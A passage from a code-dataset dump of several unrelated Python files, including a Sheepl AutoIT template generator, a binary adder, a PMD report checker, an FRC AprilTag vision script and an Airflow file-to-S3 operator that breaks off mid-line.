dictionary\n\n \\\"\"\"\n\n csh.add_task('{}_' + str(csh.counter.current()),\n {}AutoITBlock(\n csh,\n str(csh.counter.current()),\n # add in other arguments\n # for object constructor\n # ---------------------> \n ''\n # ---------------------> \n ).create()\n )\n\n # --------------------------------------------------->\n # End {} Static Method\n # --------------------------------------------------->\n \"\"\".format(self.name, self.name, self.name, self.name)\n\n return textwrap.indent(textwrap.dedent(template_task_class_static_method_definition), self.indent_space) \n\n\n # #######################################################################\n # Template AutoITBlock Definition\n # #######################################################################\n\n\n def template_class_autoIT_block_definition(self):\n \"\"\"\n Creates the AutoIT block code\n \"\"\"\n\n autoIT_block_definition = \"\"\"\n\n # #######################################################################\n # {} AutoIT Block Definition\n # #######################################################################\n\n\n class {}AutoITBlock(object):\n \\\"\"\"\n Creates an AutoIT Code Block based on the current counter\n then returns this to Task Console which pushes this upto the Sheepl Object\n with a call to create.\n String returns are pushed through (textwarp.dedent) to strip off indent tabs\n\n Build out your constructor based on what the object takes\n \\\"\"\"\n\n def __init__(self, csh, counter):\n\n self.csh = csh\n self.counter = counter\n self.indent_space = ' '\n\n\n def func_dec(self):\n \\\"\"\"\n Initial Entrypoint Definition for AutoIT function\n when using textwrap.dedent you need to add in the backslash\n to the start of the multiline\n \\\"\"\"\n\n function_declaration = \\\"\"\"\\\n\n \"\"\".format(self.name, self.name)\n\n autoIT_block_definition += self.helper_create_func_declaration_header(self.name)\n\n autoIT_block_definition += \"\"\"\n\n \\\"\"\"\n if self.csh.creating_subtasks == False:\n function_declaration += \"{}_{}()\".format(str(self.counter))\n\n return textwrap.dedent(function_declaration)\n \n \"\"\".format(self.name, '{}')\n \n return textwrap.dedent(autoIT_block_definition)\n\n\n def template_class_autoIT_block_open(self):\n \"\"\"\n Initialises the common operation for opening the program\n this is normally invoked via the 'run' command\n\n \"\"\"\n\n open_program_call = \"\"\"\n\n def open_{}(self):\n \\\"\"\"\n Creates the AutoIT Function Declaration Entry\n \\\"\"\"\n\n \\\"\"\"\n # Note a weird bug that the enter needs to be \n # passed as format string argument as escaping\n # is ignored on a multiline for some reason\n # if it gets sent as an individual line as in text_typing_block()\n # >> typing_text += \"Send('exit{}')\"\n # everything works. Strange, Invoke-OCD, and then stop caring\n # and push it through the format string.\n\n # Note > Send('yourprogram{}')\n # Example : Send('powershell{}')\n \\\"\"\"\n\n _open_{} = \\\"\"\"\n \n Func {}_{}()\n\n ; Creates a {} Interaction\n\n Send(\"#r\")\n ; Wait 10 seconds for the Run dialogue window to appear.\n WinWaitActive(\"Run\", \"\", 10)\n ; note this needs to be escaped\n ; \n Send('cmd{}') \n ; Keep Window Infocus\n WinWaitActive('#', \"\", 10)\n SendKeepActive('#')\n\n \\\"\"\".format(self.counter)\n\n return textwrap.dedent(_open_{}) \n \"\"\".format(\n self.name,\n '{ENTER}', '{ENTER}', '{ENTER}',\n self.name, \n self.name, '{}',\n self.name,\n '{ENTER}',\n self.name\n )\n\n return textwrap.indent(textwrap.dedent(open_program_call), self.indent_space)\n\n\n def template_class_autoIT_block_typing(self):\n \"\"\"\n Creates the AutoIT typing block\n \"\"\"\n\n autoIT_text_typing_block = \"\"\"\n\n def text_typing_block(self):\n \\\"\"\"\n Takes the Typing Text Input\n \\\"\"\"\n \n typing_text = 'Send(\"\")'\n # now loop round the input_text\n # represents how someone would use the enter key when typing\n \n\n for command in self.commands:\n # these are individual send commands so don't need to be wrapped in a block\n typing_text += 'Send(\"' + command + '{}\")'\n command_delay = str(random.randint(2000, 20000))\n typing_text += 'sleep(\" + command_delay + \")'\n \n # add in exit\n typing_text += 'Send(\"exit{}\")'\n typing_text += \"; Reset Focus\"\n typing_text += 'SendKeepActive(\"\")'\n\n return textwrap.indent(typing_text, self.indent_space)\n\n \"\"\".format(\n \"{ENTER}\",\n \"{ENTER}\"\n )\n\n return textwrap.indent(textwrap.dedent(autoIT_text_typing_block), self.indent_space)\n\n\n def template_class_autoIT_block_close(self):\n \"\"\"\n Creates the AutoIT Close block\n \"\"\"\n \n close_program_call = \"\"\"\n def close_{}(self): \n \\\"\"\"\n Closes the {} application function declaration\n \\\"\"\"\n\n end_func = \\\"\"\"\n\n EndFunc\n\n \\\"\"\"\n\n return textwrap.dedent(end_func)\n \"\"\".format(self.name, self.name)\n\n return textwrap.indent(textwrap.dedent(close_program_call), self.indent_space)\n\n\n def template_class_autoIT_create(self):\n \"\"\"\n Creates the main call to the constructor function for the object\n make sure to pass in the constructor parameters based on what has been \n defined in this task constructor\n \"\"\"\n\n autoIT_create = \"\"\"\n def create(self):\n \\\"\"\" \n Grabs all the output from the respective functions and builds the AutoIT output\n \\\"\"\"\n\n # Add in the constructor calls\n\n autoIT_script = (self.func_dec() +\n '' +\n self.text_typing_block() +\n ''\n )\n\n return autoIT_script\n\n \"\"\"\n\n return textwrap.indent(textwrap.dedent(autoIT_create), self.indent_space)\n\n\n # #######################################################################\n # Template Helper Functions \n # #######################################################################\n\n\n def helper_create_func_declaration_header(self, name):\n \"\"\"\n Simple wrapper function to properly work out \n the formatting size of the header\n keeps the code clean and my OCD in check\n \"\"\"\n\n dash = \"-\"\n space = ' '\n left_bar = \"; < -------\"\n right_bar = \"------- >\"\n middle = \"; \"\n indent = ' '\n\n title_length = len(self.name + \" Interaction\")\n\n top_bar = left_bar + (dash * title_length) + right_bar\n middle_bar = middle + space + (self.name + \" Interaction\") + space \n bottom_bar = left_bar + (dash * title_length) + right_bar\n\n\n # No idea why a) I thought this was a good idea, and b)\n # why you have to multiply the idents\n # ultimately though, the textwrap library strips all this\n # out so it's only needed for cleanliness to push this over\n # all this to make a dynamically expanding title box.\n\n return (\n (indent * 2) + top_bar + \"\\n\" + \n (indent * 4) + middle_bar + \"\\n\" +\n (indent * 4) + bottom_bar\n )\n\n\n \n","repo_name":"lorentzenman/sheepl","sub_path":"template/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":23776,"program_lang":"python","lang":"en","doc_type":"code","stars":390,"dataset":"github-code","pt":"61"} +{"seq_id":"40465230496","text":"#author Sila2000\r\n#binary number pertained only to positive integer\r\ndef carry_bit_add(bit1, bit2):\r\n if bit1 == bit2 == '0':\r\n return '0'\r\n elif bit1 == '0' and bit2 == '1':\r\n return '0'\r\n elif bit1 == '1' and bit2 == '0':\r\n return '0'\r\n elif bit1 == '1' and bit2 == '1':\r\n return '1'\r\n\r\n\r\ndef sum_bit_add(bit1, bit2):\r\n if bit1 == bit2 == '0':\r\n return '0'\r\n elif bit1 == '0' and bit2 == '1':\r\n return '1'\r\n elif bit1 == '1' and bit2 == '0':\r\n return '1'\r\n elif bit1 == '1' and bit2 == '1':\r\n return '0'\r\n\r\n\r\ndef bin_extender(bin1, bin2):\r\n bin1_list = list(map(str, bin1))\r\n bin2_list = list(map(str, bin2))\r\n\r\n if len(bin1_list) >= len(bin2_list):\r\n bin1_list.insert(0, '0')\r\n bin2_list = ['0'] * (len(bin1_list) - len(bin2_list)) + bin2_list\r\n return bin1_list, bin2_list\r\n else:\r\n bin2_list.insert(0, '0')\r\n bin1_list = ['0'] * (len(bin2_list) - len(bin1_list)) + bin1_list\r\n return bin1_list, bin2_list\r\n\r\n\r\nresult = []\r\n\r\n\r\ndef bin_adder(bin1, bin2):\r\n bin_set = bin_extender(bin1, bin2)\r\n bin1_list = bin_set[0]\r\n bin2_list = bin_set[1]\r\n\r\n carry_bits = []\r\n sum_bits = []\r\n #after using bin_extender function upon bin1 and bin2, bin1_list and bin2_list are of same length\r\n for i in range(len(bin1_list)):\r\n carry_bits.append(carry_bit_add(bin1_list[i], bin2_list[i]))\r\n sum_bits.append(sum_bit_add(bin1_list[i], bin2_list[i]))\r\n\r\n result.insert(0, sum_bits[len(sum_bits) - 1])\r\n sum_bits.pop(len(sum_bits) - 1)\r\n\r\n #check whether all elements of sum_bits and carry_bits are zero or not\r\n count_sum_zero = 0\r\n count_carry_zero = 0\r\n\r\n for i in range(len(sum_bits)):\r\n if sum_bits[i] == '0':\r\n count_sum_zero += 1\r\n for i in range(len(carry_bits)):\r\n if carry_bits[i] == '0':\r\n count_carry_zero += 1\r\n\r\n if count_carry_zero == len(carry_bits) and count_sum_zero == len(sum_bits):\r\n return ''.join(map(str, result))\r\n else:\r\n bin1 = ''.join(map(str, sum_bits))\r\n bin2 = ''.join(map(str, carry_bits))\r\n return bin_adder(bin1, bin2)\r\n\r\n\r\nprint(\"Binary addition (Only Integral):\")\r\nbit_num1 = str(input(\"Enter the 1st binary number: \"))\r\nbit_num2 = str(input(\"Enter the 2nd binary number: \"))\r\n\r\nprint(f\"{bit_num1} + {bit_num2} = \", bin_adder(bit_num1, bit_num2))\r\n","repo_name":"Sila2000/Working_with_Binary","sub_path":"bin_adder (positive_integer).py","file_name":"bin_adder (positive_integer).py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26327623323","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport glob\nimport yaml\nimport xml.etree.ElementTree as ET\n\n# 1 is highest, 5 is lowest, cf https://pmd.sourceforge.io/pmd-5.3.3/customizing/rule-guidelines.html\nfindings = {\n '1': 0,\n '2': 0,\n '3': 0,\n '4': 0,\n '5': 0,\n}\n\nconfig = None\nwith open(\".pipeline/config.yml\", \"r\") as stream:\n try:\n config = yaml.safe_load(stream)\n except yaml.YAMLError as exc:\n print(exc)\n\nthreshold_high = int(config['stages']['codeCheck']['pmd']['high'])\nthreshold_normal = int(config['stages']['codeCheck']['pmd']['normal'])\nthreshold_low = int(config['stages']['codeCheck']['pmd']['low'])\n\nall_pmd_report_files = glob.glob('**/pmd.xml', recursive=True)\nfor pmd_report_file in all_pmd_report_files:\n if os.path.isfile(pmd_report_file):\n parsed_pmd_report = ET.parse(pmd_report_file)\n pmd_report = parsed_pmd_report.getroot().findall('{http://pmd.sourceforge.net/report/2.0.0}file')\n for sdk_source_file in pmd_report:\n print(f\"File: .{sdk_source_file.attrib['name'].removeprefix(os.getcwd())}\")\n for violation in sdk_source_file.findall('{http://pmd.sourceforge.net/report/2.0.0}violation'):\n ET.dump(violation)\n findings[str(violation.attrib['priority'])] += 1\n print(f\" - Rule: {violation.attrib['rule']}\")\n print(f\" Priority: {violation.attrib['priority']}\")\n print(f\" Message: {violation.text.strip()}\")\n print(f\" Line: {violation.attrib['beginline']}\")\n print()\n\nhigh_findings = findings['1'] + findings['2']\nnormal_findings = findings['3']\nlow_findings = findings['4'] + findings['5']\n\nallowed_high = threshold_high if threshold_high >= 0 else 'unlimited'\nallowed_normal = threshold_normal if threshold_normal >= 0 else 'unlimited'\nallowed_low = threshold_low if threshold_low >= 0 else 'unlimited'\n\nif 'GITHUB_STEP_SUMMARY' in os.environ:\n with open(os.environ[\"GITHUB_STEP_SUMMARY\"], \"a\") as f:\n print('## PMD Result', file=f)\n print('| Category | Actual Findings | Allowed Findings |', file=f)\n print('| -------- | --------------- | ---------------- |', file=f)\n print(f\"| High | {high_findings} | {allowed_high} |\", file=f)\n print(f\"| Normal | {normal_findings} | {allowed_normal} |\", file=f)\n print(f\"| Low | {low_findings} | {allowed_low} |\", file=f)\n\nprint('pmd result:')\nprint(f\"warnings high: {high_findings}, allowed are {allowed_high}\")\nprint(f\"warnings normal: {normal_findings}, allowed are {allowed_normal}\")\nprint(f\"warnings low: {low_findings}, allowed are {allowed_low}\")\n\nif threshold_high >= 0 and high_findings > threshold_high:\n sys.exit('PMD exceeded threshold for high findings')\nelif threshold_normal >= 0 and normal_findings > threshold_normal:\n sys.exit('PMD exceeded threshold for normal findings')\nelif threshold_low >= 0 and low_findings > threshold_low:\n sys.exit('PMD exceeded threshold for low findings')\n","repo_name":"SAP/cloud-sdk-java","sub_path":".pipeline/scripts/print-pmd.py","file_name":"print-pmd.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"3312381508","text":"from django.contrib import admin\nfrom .models import Profile, MessageProfile\n# from .forms import ProfileForm\n\n\n@admin.register(Profile)\nclass ProfileAdmin(admin.ModelAdmin):\n list_display = ('username', 'id', \"id_telegram\", 'email')\n list_filter = (\"username\", 'id')\n search_fields = (\"id_telegram\", 'id')\n # # form = ProfileForm\n\n\n@admin.register(MessageProfile)\nclass MessageProfileAdmin(admin.ModelAdmin):\n list_display = ('id_profile', 'coin', 'currency', 'price', 'created_at', 'tracking_status')\n list_filter = ('coin', 'currency', 'created_at', 'tracking_status')\n search_fields = ('id_profile', 'coin', 'currency', 'created_at', 'tracking_status')\n","repo_name":"Dimskay1988/CryptoAnalytics","sub_path":"apps/Employees/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29410446717","text":"#!/usr/bin/env python3\n\ndef main():\n proto = [\"ssh\", \"http\", \"https\"]\n protoa = [\"ssh\", \"http\", \"https\"]\n print(proto)\n proto.append(\"dns\") # this line will add \"dns\" at the end of our list\n protoa.append(\"dns\") # this line will add \"dns\" at the end of our list\n print(proto)\n proto2 = [22, 80, 443, 53] # a list of common ports\n proto.extend(proto2) # pass proto2 as an argument to the extend\n print(proto)\n protoa.append(proto2) # pass proto2 as an argument to the append method\n \n\n # Current contents of list\n print(protoa)\n # Remove and print last element until list is empty.\n while len(protoa):\n print(protoa.pop())\n print(protoa)\n\n # One line approach\n print(proto)\n proto.clear()\n print(proto)\n \n\nif __name__ == '__main__':\n main()\n","repo_name":"segarciat/mycode","sub_path":"tutorials/lab33-list-methods/listmeth02.py","file_name":"listmeth02.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"44380506665","text":"import json\nimport requests\n\nfrom django.conf import settings\n\n'''\nThis is an example of how to send data to Slack webhooks in Python with the\nrequests module.\nDetailed documentation of Slack Incoming Webhooks:\nhttps://api.slack.com/incoming-webhooks\n'''\n\n\ndef slack_message(string):\n webhook_url = settings.SLACK_WEB_HOOK\n print(webhook_url)\n slack_data = {'text': string}\n\n response = requests.post(\n webhook_url, data=json.dumps(slack_data),\n headers={'Content-Type': 'application/json'}\n )\n if response.status_code != 200:\n raise ValueError(\n 'Request to slack returned an error %s, the response is:\\n%s'\n % (response.status_code, response.text)\n )\n\n return response.status_code\n","repo_name":"NPeredoEsquivel/Backend-Test-Peredo","sub_path":"yumminess/slackmessage.py","file_name":"slackmessage.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8606939043","text":"# Import the camera server\r\nfrom cscore import CameraServer\r\nimport ntcore\r\nfrom ntcore import NetworkTableInstance\r\nfrom enum import Enum\r\n\r\nimport robotpy_apriltag\r\nimport cv2\r\nimport numpy as np\r\nimport time\r\nX_RES = 320\r\nY_RES = 240\r\nSECOND_COUNTER = 1\r\nDEBUG_MODE_DEFAULT = False\r\nTHREADS_DEFAULT = 3\r\nDECIMATE_DEFAULT = 1.0\r\nBLUR_DEFAULT = 0.0\r\nREFINE_EDGES_DEFAULT = 1\r\nSHARPENING_DEFAULT = 0.25\r\nAPRILTAG_DEBUG_MODE_DEFAULT = False\r\nDECISION_MARGIN_DEFAULT = 125\r\n\r\nclass NTConnectType(Enum):\r\n SERVER = 1\r\n CLIENT = 2\r\n\r\nclass NTGetString:\r\n def __init__(self, stringTopic: ntcore.StringTopic, init, default, failsafe):\r\n self.init = init\r\n self.default = default\r\n self.failsafe = failsafe\r\n # start subscribing; the return value must be retained.\r\n # the parameter is the default value if no value is available when get() is called\r\n self.stringTopic = stringTopic.getEntry(failsafe)\r\n\r\n self.stringTopic.setDefault(default)\r\n self.stringTopic.set(init)\r\n\r\n def get(self):\r\n return self.stringTopic.get(self.failsafe)\r\n\r\n def set(self, string):\r\n self.stringTopic.set(string)\r\n\r\n def unpublish(self):\r\n # you can stop publishing while keeping the subscriber alive\r\n self.stringTopic.unpublish()\r\n\r\n def close(self):\r\n # stop subscribing/publishing\r\n self.stringTopic.close()\r\n\r\nclass NTGetDouble:\r\n def __init__(self, dblTopic: ntcore.DoubleTopic, init, default, failsafe):\r\n self.init = init\r\n self.default = default\r\n self.failsafe = failsafe\r\n # start subscribing; the return value must be retained.\r\n # the parameter is the default value if no value is available when get() is called\r\n self.dblTopic = dblTopic.getEntry(failsafe)\r\n self.dblTopic.setDefault(default)\r\n self.dblTopic.set(init)\r\n\r\n def get(self):\r\n return self.dblTopic.get(self.failsafe)\r\n\r\n def set(self, double):\r\n self.dblTopic.set(double)\r\n\r\n def unpublish(self):\r\n # you can stop publishing while keeping the subscriber alive\r\n self.dblTopic.unpublish()\r\n\r\n def close(self):\r\n # stop subscribing/publishing\r\n self.dblTopic.close()\r\n\r\nclass NTGetBoolean:\r\n def __init__(self, boolTopic: ntcore.BooleanTopic, init, default, failsafe):\r\n self.init = init\r\n self.default = default\r\n self.failsafe = failsafe\r\n\r\n # start subscribing; the return value must be retained.\r\n # the parameter is the default value if no value is available when get() is called\r\n self.boolTopic = boolTopic.getEntry(failsafe)\r\n\r\n self.boolTopic.setDefault(default)\r\n self.boolTopic.set(init)\r\n\r\n def get(self):\r\n return self.boolTopic.get(self.failsafe)\r\n def set(self, boolean):\r\n self.boolTopic.set(boolean)\r\n def unpublish(self):\r\n # you can stop publishing while keeping the subscriber alive\r\n self.boolTopic.unpublish()\r\n\r\n def close(self):\r\n # stop subscribing/publishing\r\n self.boolTopic.close()\r\n\r\nntconnect = NTConnectType(NTConnectType.SERVER)\r\n\r\ndef main():\r\n # start NetworkTables\r\n ntinst = NetworkTableInstance.getDefault()\r\n if ntconnect == NTConnectType.SERVER:\r\n ntinst.startServer()\r\n else:\r\n ntinst.startClient4(\"raspberrypi910\")\r\n \r\n detector = robotpy_apriltag.AprilTagDetector()\r\n detectorConfig = robotpy_apriltag.AprilTagDetector.Config()\r\n \r\n # Table for vision output information\r\n \r\n uptime_ntt = NTGetDouble(ntinst.getDoubleTopic(\"/Vision/Uptime\"), 0, 0, -1)\r\n debug_ntt = NTGetBoolean(ntinst.getBooleanTopic(\"/Vision/Debug Mode\"), False, DEBUG_MODE_DEFAULT, DEBUG_MODE_DEFAULT)\r\n threads_ntt = NTGetDouble(ntinst.getDoubleTopic(\"/Vision/Threads\"),THREADS_DEFAULT, THREADS_DEFAULT, THREADS_DEFAULT)\r\n quadDecimate_ntt = NTGetDouble(ntinst.getDoubleTopic(\"/Vision/Decimate\"),DECIMATE_DEFAULT, DECIMATE_DEFAULT, DECIMATE_DEFAULT)\r\n blur_ntt = NTGetDouble(ntinst.getDoubleTopic(\"/Vision/Blur\"),BLUR_DEFAULT, BLUR_DEFAULT, BLUR_DEFAULT) \r\n refineEdges_ntt = NTGetDouble(ntinst.getDoubleTopic(\"/Vision/Edge Refine\"),REFINE_EDGES_DEFAULT, REFINE_EDGES_DEFAULT, REFINE_EDGES_DEFAULT) \r\n decodeSharpening_ntt = NTGetDouble(ntinst.getDoubleTopic(\"/Vision/Sharpening\"), SHARPENING_DEFAULT, SHARPENING_DEFAULT, SHARPENING_DEFAULT)\r\n ATDebug_ntt = NTGetBoolean(ntinst.getBooleanTopic(\"/Vision/April Tag Debug\"), APRILTAG_DEBUG_MODE_DEFAULT, APRILTAG_DEBUG_MODE_DEFAULT, APRILTAG_DEBUG_MODE_DEFAULT)\r\n decision_margin_ntt = NTGetDouble(ntinst.getDoubleTopic(\"/Vision/Decision Margin\"), DECISION_MARGIN_DEFAULT, DECISION_MARGIN_DEFAULT, DECISION_MARGIN_DEFAULT)\r\n\r\n detectorConfig.numThreads = THREADS_DEFAULT\r\n detectorConfig.quadDecimate = DECIMATE_DEFAULT\r\n detectorConfig.quadSigma = BLUR_DEFAULT\r\n detectorConfig.refineEdges = REFINE_EDGES_DEFAULT\r\n detectorConfig.decodeSharpening = SHARPENING_DEFAULT\r\n detectorConfig.debug = APRILTAG_DEBUG_MODE_DEFAULT\r\n detector.setConfig(detectorConfig)\r\n detector.addFamily(\"tag16h5\")\r\n \r\n\r\n # Wait for NetworkTables to start\r\n time.sleep(0.5)\r\n\r\n # Capture from the first USB Camera on the system\r\n camera = CameraServer.startAutomaticCapture()\r\n camera.setResolution(X_RES, Y_RES)\r\n\r\n # Get a CvSink. This will capture images from the camera\r\n cvSink = CameraServer.getVideo()\r\n\r\n # (optional) Setup a CvSource. This will send images back to the Dashboard\r\n outputStream = CameraServer.putVideo(\"final image\", X_RES, Y_RES)\r\n\r\n # Allocating new images is very expensive, always try to preallocate\r\n img = np.zeros(shape=(X_RES, Y_RES, 3), dtype=np.uint8)\r\n\r\n print(\"Hello\")\r\n\r\n seconds = 0\r\n current_seconds = 0\r\n prev_seconds = 0\r\n while True:\r\n start_time = time.time()\r\n current_seconds = start_time\r\n if int(current_seconds - prev_seconds) >= SECOND_COUNTER:\r\n prev_seconds = current_seconds\r\n seconds = seconds + 1\r\n uptime_ntt.set(seconds)\r\n print(seconds)\r\n\r\n # Tell the CvSink to grab a frame from the camera and put it\r\n # in the source image. If there is an error notify the output.\r\n frame_time, img = cvSink.grabFrame(img)\r\n if frame_time == 0:\r\n # Send the output the error.\r\n outputStream.notifyError(cvSink.getError())\r\n # skip the rest of the current iteration\r\n continue\r\n\r\n #\r\n # Insert your image processing logic here!\r\n #\r\n gimg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n \r\n detectorConfig.numThreads = int(threads_ntt.get())\r\n detectorConfig.quadDecimate = quadDecimate_ntt.get()\r\n detectorConfig.quadSigma = blur_ntt.get()\r\n detectorConfig.refineEdges = refineEdges_ntt.get()\r\n detectorConfig.decodeSharpening = decodeSharpening_ntt.get()\r\n detectorConfig.debug = ATDebug_ntt.get()\r\n detector.setConfig(detectorConfig)\r\n \r\n detected = detector.detect(gimg)\r\n for tag in detected:\r\n if tag.getDecisionMargin() > decision_margin_ntt.get() and tag.getId() >= 1 and tag.getId() <= 8:\r\n if debug_ntt.get() == True:\r\n \r\n x0 = int(tag.getCorner(0).x)\r\n y0 = int(tag.getCorner(0).y)\r\n x1 = int(tag.getCorner(1).x)\r\n y1 = int(tag.getCorner(1).y)\r\n x2 = int(tag.getCorner(2).x)\r\n y2 = int(tag.getCorner(2).y)\r\n x3 = int(tag.getCorner(3).x)\r\n y3 = int(tag.getCorner(3).y)\r\n\r\n cv2.line(img, (x0, y0), (x1, y1), (0,255,0), 20) #starts at top left corner of apriltag\r\n cv2.line(img, (x1, y1), (x2, y2), (0,255,0), 20) #top left to bottom left\r\n cv2.line(img, (x2, y2), (x3, y3), (0,255,0), 20) #bottom left to bottom right\r\n cv2.line(img, (x3, y3), (x0, y0), (0,255,0), 20) #bottom right to top right\r\n cv2.putText(img, str(tag.getId()), (int(tag.getCenter().x), int(tag.getCenter().y)), cv2.FONT_HERSHEY_TRIPLEX, 1, (0, 0, 255)) # ID in center\r\n\r\n if debug_ntt.get() == True:\r\n outputStream.putFrame(img) # send to dashboard\r\n\r\nmain()","repo_name":"FoleyFreeze/2023-FRC-Vision","sub_path":"vision.py","file_name":"vision.py","file_ext":"py","file_size_in_byte":8401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11889573008","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n \n def print_list(self):\n cur_node = self.head\n \n while cur_node:\n print(cur_node.data)\n cur_node = cur_node.next\n \n def append(self, data):\n #create memory\n new_node = Node(data)\n \n #insertion in an empty linked list\n if self.head is None:\n self.head = new_node\n return \n \n #insertion at the end of the linked list\n last_node = self.head\n while last_node.next is not None:\n last_node = last_node.next\n \n last_node.next = new_node\n \n def prepend(self, data):\n #create memory\n new_node = Node(data)\n \n #prepend inserts data in the beginning\n new_node.next = self.head #new node points to the head\n self.head = new_node #now new node is the head node\n \n \nif __name__ == \"__main__\":\n llist = LinkedList()\n\n llist.append(\"A\")\n llist.append(\"B\")\n llist.append(\"C\")\n llist.prepend(\"D\")\n\n llist.print_list()","repo_name":"bipulhstu/Data-Structures-and-Algorithms-Through-Python-in-Depth","sub_path":"1. Single Linked List/4. Linked List Insertion (prepend).py","file_name":"4. Linked List Insertion (prepend).py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"26894648494","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\nimport re\nimport sys\n\ndef parseArgs():\n p = argparse.ArgumentParser(description =\n \"Work out Java class depencies\")\n p.add_argument(\"--build-dir\", \"-b\", type = str, metavar = \"DIR\",\n help = \"Set the build directory\", default = \"\")\n p.add_argument(\"infile\", metavar = \"FILENAME\", type = str)\n args = p.parse_args()\n return args\n\n# Search the source file for references to other classes in\n# the same package. Return a list of fully-specified class names.\ndef getIncludes(lines):\n deps = []\n regexp = re.compile(r'^\\s*\\\\include\\{(\\S+)\\}')\n for line in lines:\n m = regexp.match(line)\n if m:\n deps.append(m.group(1))\n return deps\n\n# Convert extensionless includes into real file names.\ndef findFiles(deps):\n ret = []\n for d in deps:\n if len(os.path.splitext(d)[1]) == 0:\n d = d + \".tex\"\n ret.append(d)\n return ret\n\ndef getDeps(fname):\n fp = open(fname, \"r\")\n lines = fp.readlines()\n fp.close()\n\n includes = getIncludes(lines)\n includes = findFiles(includes)\n\n return includes\n\ndef main():\n args = parseArgs()\n deps = getDeps(args.infile)\n for i in deps:\n print(i)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"chrisdiamand/buildsystem","sub_path":"latexdep.py","file_name":"latexdep.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29592463007","text":"\"\"\"Add {PROJECT_ROOT}. to PYTHONPATH\n\nUsage:\nimport this module before import any intra-project modules\ne.g \n import _init_paths\n from datasets import dataset\n\"\"\" \n\nimport os.path as osp\nimport sys\n\ndef add_path(path):\n if path not in sys.path:\n sys.path.insert(0, path)\n\nproject_root = osp.abspath(osp.dirname(osp.dirname(__file__)))\n\n# Add project dir to PYTHONPATH\nadd_path(project_root)","repo_name":"allpan3/multi-concept-MNIST","sub_path":"tools/_init_paths.py","file_name":"_init_paths.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"797990153","text":"## file_to_s3.py => operator\n\nimport logging\nimport pandas as pd\nimport json\nimport boto3\n\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\nfrom airflow.models import Variable\nfrom airflow.hooks.base import BaseHook\n\nfrom airflow.operators.python import get_current_context\n\n\n\"\"\"The stage operator is expected to be able to load any JSON formatted files from S3 to Amazon Redshift.\nThe operator creates and runs a SQL COPY statement based on the parameters provided.\nThe operator's parameters should specify where in S3 the file is loaded and what is the target table.\n\nThe parameters should be used to distinguish between JSON file.\nAnother important requirement of the stage operator is containing a templated field that allows it to load\ntimestamped files from S3 based on the execution time and run backfills.\"\"\"\n\nclass FileToS3Operator(BaseOperator):\n template_fields = ('link_file','file_name',)\n\n @apply_defaults\n def __init__(self,\n aws_credentials=\"\",\n bucket_name=\"\",\n link_file=\"\",\n data_type=\"\",\n file_name=\"\",\n link_args={},\n *args, **kwargs):\n\n super(FileToS3Operator, self).__init__(*args, **kwargs)\n self.aws_credentials=aws_credentials\n self.bucket_name=bucket_name\n self.link_file=link_file\n self.data_type=data_type\n self.file_name=file_name\n\n\n def execute(self, context):\n logging.info(f\"Parameters: {self.aws_credentials}, {self.bucket_name}, {self.link_file}, {self.data_type}, {self.file_name}\")\n connection = BaseHook.get_connection(self.aws_credentials)\n secret_key = connection.password # This is a getter that returns the unencrypted pass\n access_key = connection.login # This is a getter that returns the unencrypted login\n\n bucket = Variable.get(self.bucket_name)\n row = 0\n\n link = self.link_file\n logging.info(link)\n\n if self.data_type == 'json':\n df = pd.read_json(link)\n row, col = df.shape\n\n elif self.data_type == 'csv':\n df = pd.read_csv(link, sep=\";\", decimal=\",\")\n row, col = df.shape\n \n elif self.data_type == 'csv-l':\n df = pd.read_csv(link, sep=\";\", decimal=\",\", header=0, encoding='latin-1')\n row, col = df.shape\n \n elif self.data_type == 'csv-h':\n headers = {\"User-Agent\": \"pandas\"}\n df = pd.read_csv(link, sep=\";\", storage_options=headers, decimal=\",\")\n row, col = df.shape\n\n elif self.data_type == 'xlxs':\n df = pd.read_excel(link)\n row, col = df.shape\n\n elif self.data_type == 'xcom':\n dict_data = context['task_instance'].xcom_pull(key=link)\n df = pd.DataFrame.from_dict(dict_data)\n row, col = df.shape\n\n else:\n raise ValueError(f\"Data type {self.data_type} is not in the scope\")\n\n\n if row == 0:\n logging.error(f\"Read file from {link} result in 0 row\")\n else:\n logging.info(f\"Read file from {link} \\n row = {row}\")\n\n file_json = df.to_json(orient=\"records\")\n\n#Creating Session With Boto3\n session = boto3.Session(\n aws_access_key_id=access_key,\n aws_secret_access_key=secret_key,\n region_name='us-west-2'\n )\n\n#Creating S3 Resource From the Session.\n s3 = session.resource('s3')\n s3_object = s3.Object(bucket, self.file_name)\n s3_insert = s3_object.put(Body=file_json)\n\n result = s3_insert.get('ResponseMetadata')\n\n if result.get('HTTPStatusCode') == 200:\n logging.info(f'File Uploaded Successfully {self.file_name}')\n else:\n logging.error(f'File Not Uploaded 